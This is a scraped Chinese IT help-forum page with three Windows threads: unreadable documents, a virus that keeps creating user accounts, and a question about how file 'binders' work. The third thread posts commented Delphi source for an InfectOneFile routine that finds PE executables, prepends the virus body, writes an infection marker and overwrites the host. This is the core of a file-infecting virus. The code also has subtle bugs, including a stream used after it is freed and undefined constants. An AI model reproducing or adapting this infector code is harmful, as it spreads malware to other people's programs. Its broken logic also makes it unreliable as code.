当前位置:  操作系统/服务器>windows
本页文章导读:
    ▪哪位高手来速度帮帮妹妹吧,汗死了        谁来速度帮帮妹妹吧,汗死了接到的文件,打开文档都是乱码,我晕死,这可是公司的重要文件那 1是没有该类型文件的软件,找个相应的软件2要是压缩的文件有可能损坏,修复一下试试看3.........
    ▪ ?操作系统自动创建新用户?解决思路        ??操作系统自动创建新用户?我的电脑前两天中了病毒,现在我如果以一个我原有的系统账号登陆操作系统,总会有一个新的账号创建,而且会重新设置桌面。大家有遇到过这种问题的吗.........
    ▪ 捆绑机的基本原理(多谢回答!)       捆绑机的基本原理(谢谢回答!!)两个文件流,然后写入内存流,保存文件有如下代码,是他的基本原理吧Delphi(Pascal) code procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; d.........

[1]哪位高手来速度帮帮妹妹吧,汗死了
    来源: 互联网  发布时间: 2014-02-18
谁来速度帮帮妹妹吧,汗死了
接到的文件,打开文档都是乱码,我晕死,这可是公司的重要文件那


1是没有该类型文件的软件,找个相应的软件
2要是压缩的文件有可能损坏,修复一下试试看
3后缀名可能被更改,原来的文件是.什么的就改成什么!!

    
[2] ?操作系统自动创建新用户?解决思路
    来源: 互联网  发布时间: 2014-02-18
??操作系统自动创建新用户?
我的电脑前两天中了病毒,现在我如果以一个我原有的系统账号登陆操作系统,总会有一个新的账号创建,而且会重新设置桌面。大家有遇到过这种问题的吗?


没有遇到过~
具体是什么情况?

没有啊!是不是系统设置有问题啊?

没见过啊

还有病毒。
还是重装一下吧

进安全模式杀毒看看吧

建议用sysinternals的autoruns看看你启动的时候运行了些什么,就可以一一排除。

先确定一下那帐户不是你装的程序类的创建的
那就应该木马了
难道楼主被啊黑看上了?
不过啊黑一般不会创建另外的用户或留下很明显的痕迹.
杀毒吧

mark

原先的用户是不是是管理员组,有两种可能性,一种是被创建了登陆自动执行建立用户的脚本,可以查看新建立用户的时间,另一个是病毒,这个就比较广泛了,一般病毒如果杀毒软件查杀不了也没什么大惊小怪的,直接重新做系统来的干脆点!

up

从启动项里看一下,关闭不用的启动项!在运行命令中输入msconfig,即可打开系统配置选项!

是后门程序给你开的以后黑客进你电脑就方便了!是什么账户?

这样的问题还不曾见过呢

比较怀疑是黑客

不会别人远程控制了吧?
推荐你一本书,国家反病毒中心写的《网络安全攻防实战》,专门介绍黑客如何入侵,
知己知彼啊,能帮助你分析一下是什么原因。

用procexp看看有没有可疑的进程
用autoruns看看有没有可疑的启动项

    
[3] 捆绑机的基本原理(多谢回答!)
    来源: 互联网  发布时间: 2014-02-18
捆绑机的基本原理(谢谢回答!!)
两个文件流,然后写入内存流,保存文件
有如下代码,是他的基本原理吧
Delphi(Pascal) code


procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
               dStartPos: Integer; Count: Integer);
var
   sCurPos, dCurPos: Integer;
begin
   sCurPos := Src.Position;
   dCurPos := Dst.Position;
   Src.Seek(sStartPos, 0);
   Dst.Seek(dStartPos, 0);
   Dst.CopyFrom(Src, Count);
   Src.Seek(sCurPos, 0);
   Dst.Seek(dCurPos, 0);
end;

procedure InfectOneFile(FileName: string);
var
   SelfStream, SrcStream: TFileStream; //两个文件流一个存放自己,一个存放宿主程序
   DstStream: TMemoryStream;//将自己和宿主程序合并后存入这个流
   iID: LongInt;//取得程序的最后4个字节的数据与感染标记比对
   Infected, IsPE: Boolean;//判断是否已被感染和是否为PE文件格式
   i: Integer;
   Buf: array[0..1] of Char;
   begin
    try
    Infected := False;
    IsPE      := False;
//创建宿主程序到SrcStream
    SrcStream := TFileStream.Create(FileName, fmOpenRead); 
    try
      for i := 0 to $108 do //检查PE文件头PE头偏移量一般小于$108(十六进制)
      begin
        SrcStream.Seek(i, soFromBeginning);//将流指向文件开始
        SrcStream.Read(Buf, 2);//每两个字节读取到buf
        //#80#69就是字母PE,PE头以PE字母开头
        if (Buf[0] = #80) and (Buf[1] = #69) then
        begin
         IsPE := True; //是PE文件
         Break;
        end;
      end;
      SrcStream.Seek(-4, soFromEnd); //将流指向文件最后面的倒数第4个字节
      SrcStream.Read(iID, 4);//把这4个字节读出来判断是不是$44444444即感染标记
      if (iID = ID) or (SrcStream.Size > 1024000) then //大于10M的文件不感染
       Infected := True;
     finally
        SrcStream.Free;
     end;
     if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
       Exit;
     DstStream := TMemoryStream.Create;
     try
          //将本程序写入SelfStream流
          SelfStream := TFileStream.Create(ParamStr(0), fmOpenRead);
          try
           //写入本程序即病毒体到合并流
           CopyStream(SelfStream, 0, DstStream, 0, VSize);
           //再接着写入宿主程序
           CopyStream(SrcStream, 0, DstStream, VSize,
             SrcStream.Size);
           ////将流指向流的结尾
           DstStream.Seek(0, soFromEnd); 
           iID := $44444444;
           DstStream.Write(iID, 4);//写入4个字节的感染标记
           finally
               SelfStream.Free;
           end;
         finally
           SrcStream.Free;
           DstStream.SaveToFile(FileName); //替换宿主文件 ,保存文件
           DstStream.Free;
         end;
         except;
         end;
end;










看不懂,还是顶一下啊。

你这个是什么语言写的?貌似是Delphi?
--reply by CSDN Study V1.0.0.3 (starts_2000)

    
最新技术文章:
▪文件转换有关问题     ▪ 3ds max 2009 mentalray遇到内存相关的错,该怎么解...    ▪ 文萃ocr的注册码哪位高手有
▪常见文件密码的设置与解除解决思路     ▪ 数据恢复软件哪个好用?该怎么处理     ▪ vmware高手帮忙解决一个常见有关问题
▪求会声会影的注册机啊 到处找不到 T_T,该怎么...    ▪ 急求!硬盘解密软件。解决思路     ▪ 大侠们有改过chrome的临时文件夹的吗?小弟我...
▪怎么在windows下查看计算机的内存大小     ▪ 宏基玩2k10的有关问题     ▪ 求日语操作系统;链接解决思路
▪怎样制作软件自动安装解决思路     ▪ UtrlEdit重新加载已更新的文件内容时,不让其...    ▪ 小弟我的数据库卸载后装不上怎么处理
▪win7的编程工具选择?该如何解决     ▪ 开机按回车咋办,该怎么解决     ▪ 怎么刻录一张系统盘
▪强行卸载如何用哦?     ▪ 为什么QQ音乐的乐库打不开,显示是一片空白...    ▪ 如何控制局域网其它电脑的流量啊宿舍人老...
▪AutoPlay Menu Loader 5.1.0.341,该如何解决     ▪ 100分求个软件免费或收费的都可以,最好熟...    ▪ 远程桌面连接如何设置磁盘共享
▪请教怎么知道TXT文件的编码方式呢     ▪ QQ收件箱中的邮件不知不觉被自动删除了解决...    ▪ qq如何去广告
▪双击C与C++程序设计学习与实验系统,就打开...    ▪ 急电脑黑屏的原因,该怎么解决     ▪ 请问Sdelete这个软件的使用方法
▪虚拟机中怎么切换     ▪ “假的”mp4视频文件怎么打开     ▪ XP照片缩略图和照片本身显示不一致解决思路...
▪激光检测仪数控机床日文的,该如何处理     ▪ 怎么打开*crp格式的文件     ▪ 联想Z465玩魔兽争霸黑屏,大侠帮帮忙解决一下...
▪u盘插入电脑时报错!解决方案     ▪ Pixelpop有人用过吗?解决方法     ▪ 加快解压速度小弟我有招
▪高分,小弟我是windows xp的系统,请教如何才...    ▪ 加密网页怎样破解密码?解决办法     ▪ 佛爱小弟我羊老师请进
▪Runtime Error (-1:0): Cannot Import dll,该如何解决     ▪ 关于刻录系统光盘的有关问题     ▪ CCPROXY的有关问题(结贴100%)
▪print screen键不能截屏?该怎么处理     ▪ 用Serv-U做了个FTP服务器,为什么浏览器不能...    ▪ ftp下载稍微大一点的文件时不让下载,该如何...
▪Internet Explorer删除不了解决思路     ▪ 安装在开始菜单里面程序的位置为什么不同...    ▪ 赛扬2.8GHz的CPU内存1GB双硬盘能跑VMware Workstatio...
▪VisualSVN Server 经常异常覆盖如何解决     ▪ 怎么封装(打包)exe文件     ▪ 重新打开ie的自动密码保存要如何做
▪请教windows多久自动清空IE缓存     ▪ 高手帮忙看下这个autohotkey脚本,快捷复制粘贴...    ▪ 怎办?winpcap 4.1.2 安装失败!该怎么解决
▪ultraedit里,当选择列模式时,用用查找替换功...    ▪ intel MKL pardiso求解大型稀疏矩阵,是不是很浪...    ▪ cmd 中的管道是哪个程序在前?解决方法
▪金山词霸PDF取词插件解决方案解决思路     ▪ 想要学习ps,该怎么解决     ▪ WinRAR自解压时能否读取注册表中的信息,来...
▪怎么架设多对多媒体服务器     ▪ VMware解决方法     ▪ 腾讯Q+平台怎么申请接口
▪应用程序作为系统服务。解决办法     ▪ (文件编码有关的字符串替换)通过CMD批处理,...    ▪ 234.34.23.234:33674这个ip地址一般是用来做什么...
▪视频会议软件用什么样的好呢?解决办法     ▪ 怎么将ActiveX控件Cab包制作成EXE安装格式     ▪ 怎样从硬盘安装苹果雪豹系统,该如何处理
▪关于邮件组的有关问题!请专业邮箱技术支持...    ▪ 打印机有关问题     ▪ window下的vim怎么不产生备份文件
▪急 压缩文件夹,该怎么处理     ▪ Multisim软件如何样?那里有安装文件     ▪ 问个关于分区的小疑点啊很简单,来拿分啦
▪批处理高手帮忙了 啊 送分中,该怎么处理     ▪ wix打包发布 如何更改默认的安装包图标     ▪ 酷狗*krc歌词的文件结构及压缩算法
▪小弟我是个大笨鸟哪位高手帮帮小弟我     ▪ 哪款浏览器占用内存较少?解决办法     ▪ 有关问题
▪请教Polaris Office的文件格式能转换为pdf吗     ▪ wmp是用什么解码器比较好?该如何解决     ▪ 求Ardence.RTX.v7.0.SDK Ardence.RTX.v7.0.Runtime 下载解...
▪使用wireshark抓包,wireshark上显示的时间和pc时...    ▪ windows live mail 按send/receive 怎么不send,只receiv...    ▪ 某个exe程序始终无法运行,任务管理器里闪...
 


站内导航:


特别声明:169IT网站部分信息来自互联网,如果侵犯您的权利,请及时告知,本站将立即删除!

©2012-2021,,E-mail:www_#163.com(请将#改为@)

浙ICP备11055608号-3